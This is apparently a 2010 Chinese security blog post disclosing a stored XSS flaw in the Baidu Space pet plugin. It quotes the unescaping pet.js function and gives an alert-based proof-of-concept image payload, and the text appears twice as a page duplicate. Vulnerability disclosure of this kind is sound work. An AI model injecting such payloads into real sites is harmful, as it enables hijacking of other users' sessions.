百度Hi宠物插件XSS

2010年05月14日 | category

学习笔记| 坏人咖啡

Author: pz
Blog: http://hi.baidu.com/p__z
Team: http://www.80vul.com
date: 2010年5月13日

一 综述

百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.

二 分析

1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中

将输出一段HTML:&lt;p style="margin-top:5px"&gt;&lt;strong&gt;'+F[2]+"说：&lt;/strong&gt;"+BdUtil.insertWBR(F[0], 4)+'&lt;/p&gt;
其中BdUtil.insertWBR为
function(text, step) {
    var textarea = textAreaCache || getContainer();
    if (!textarea) {
        return text;
    }
    textarea.innerHTML = text.replace(/&amp;/g, "&amp;amp;").replace(/&lt;/g, "&amp;lt;").replace(/&gt;/g, "&amp;gt;");
    var string = textarea.value;
    var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
    var result = string.replace(/(&lt;[^&gt;]+&gt;)/gi, "$1&lt;wbr/&gt;").replace(/(&gt;|^)([^&lt;]+)(&lt;|$)/gi, function (a, b, c, d) {if (c.length &lt; step) {return a;}return b + c.replace(reg, "$1&lt;wbr/&gt;") + d;}).replace(/&amp;([^;]*)(&lt;wbr\/?&gt;)([^;]*);/g, "&amp;$1$3;");
    return result;
}
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.

三 利用

POC :

宠物留言管理处输入:&lt;img src=# onerror=alert(/sobb04/)&gt;

四 补丁[fix]

等待官方补丁

Author: pz

Blog: http://hi.baidu.com/p__z

Team: http://www.80vul.com

date: 2010年5月13日

一综述

百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.

二分析

1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.

2.在http://hi.baidu.com/ui/scripts/pet/pet.js中

将输出一段HTML:'+F[2]+"说："+BdUtil.insertWBR(F[0], 4)+'

其中BdUtil.insertWBR为

function(text, step) {

var textarea = textAreaCache || getContainer();

if (!textarea) {

return text;

}

textarea.innerHTML = text.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");

var string = textarea.value;

var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");

var result = string.replace(/(<[^>]+>)/gi, "$1").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");

return result;

}

在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.

三利用

POC :

宠物留言管理处输入:<img src=# onerror=alert(/sobb04/)>

四补丁[fix]

等待官方补丁

所属分类: 学习笔记
Tags: XSS, 漏洞, 百度, 跨站

« 百度Hi CSRF Bug

百度HI个人信息页XSS »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

百度Hi宠物插件XSS

没有评论

文章分类

热门标签

随机文章

文章归档

Users